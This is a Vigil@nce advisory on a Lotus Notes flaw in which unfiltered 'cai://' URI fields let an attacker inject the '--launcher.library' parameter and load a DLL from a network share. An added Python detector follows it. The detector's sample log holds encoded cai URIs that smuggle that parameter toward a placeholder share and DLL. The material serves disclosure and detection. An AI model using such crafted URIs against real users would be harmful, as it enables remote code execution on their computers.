Vigil@nce - Lotus Notes: buffer overflow via cai
February 2011 by Vigil@nce
This bulletin was written by Vigil@nce: http://vigilance.fr/
SYNTHESIS OF THE VULNERABILITY
An attacker can invite the victim to open a malicious "cai" URI,
in order to execute code on the victim's computer.
Severity: 2/4
Creation date: 07/02/2011
Revision date: 08/02/2011
IMPACTED PRODUCTS
– Lotus Notes
DESCRIPTION OF THE VULNERABILITY
URIs of type "cai://" are used to launch a composite application,
or to access a page:
cai://[GUID]/[PageId]pagealias=abchint=def
When Lotus Notes parses a malicious "cai" URI, its fields are not
filtered. An attacker can thus alter the content of the
"--launcher.library" parameter, in order to load a malicious DLL
library located on a network share.
An attacker can therefore invite the victim to open a malicious
"cai" URI, in order to execute code on the victim's computer.
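A defender-side check that follows from the description above, added here as an example and not part of the Vigil@nce bulletin or of Lotus Notes: it scans log or mail text for "cai" URIs whose percent-decoded fields contain the "launcher.library" parameter name or a network share path. The function names, the two heuristics and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Heuristics taken from the bulletin text only (assumptions, not vendor signatures).
CAI_URI = re.compile(r'\bcai:[^\s"\'<>]*', re.IGNORECASE)
LAUNCHER_PARAM = re.compile(r'launcher\.library', re.IGNORECASE)
UNC_PATH = re.compile(r'(?:\\\\|//)[\w.-]+[\\/][\w$.-]+')  # \\host\share or //host/share

def decode(value, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded fields are seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_uri(uri):
    """Return the reasons a cai URI looks suspicious (empty list if none)."""
    # Drop the scheme and its slashes so "cai://" itself is not read as a share.
    rest = re.sub(r'^cai:/*', '', decode(uri), flags=re.IGNORECASE)
    reasons = []
    if LAUNCHER_PARAM.search(rest):
        reasons.append("launcher.library parameter")
    if UNC_PATH.search(rest):
        reasons.append("network share path")
    return reasons

def scan(lines):
    """Return (line_number, uri, reasons) for every suspicious cai URI found."""
    hits = []
    for number, line in enumerate(lines, 1):
        for uri in CAI_URI.findall(line):
            reasons = inspect_uri(uri)
            if reasons:
                hits.append((number, uri, reasons))
    return hits

# Constructed log lines for testing the detector; hosts and file names are placeholders.
SAMPLE_LOG = [
    'href="cai://[GUID]/[PageId]pagealias=abchint=def"',
    'href="cai://GUID-0002/Page1?hint=%2D%2Dlauncher.library%20%5C%5Cfileserver.example%5Cshare%5Cplaceholder.dll"',
    'href="cai://GUID-0003/Page1?hint=%252D%252Dlauncher%252Elibrary"',
    'href="https://intranet.example/doc"',
]

if __name__ == "__main__":
    for number, uri, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}: {uri}")
```

The share-path pattern also matches an ordinary URL nested inside a field, so hits are leads for review rather than verdicts.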
ACCESS TO THE COMPLETE VIGIL@NCE BULLETIN
http://vigilance.fr/vulnerability/Lotus-Notes-buffer-overflow-via-cai-10332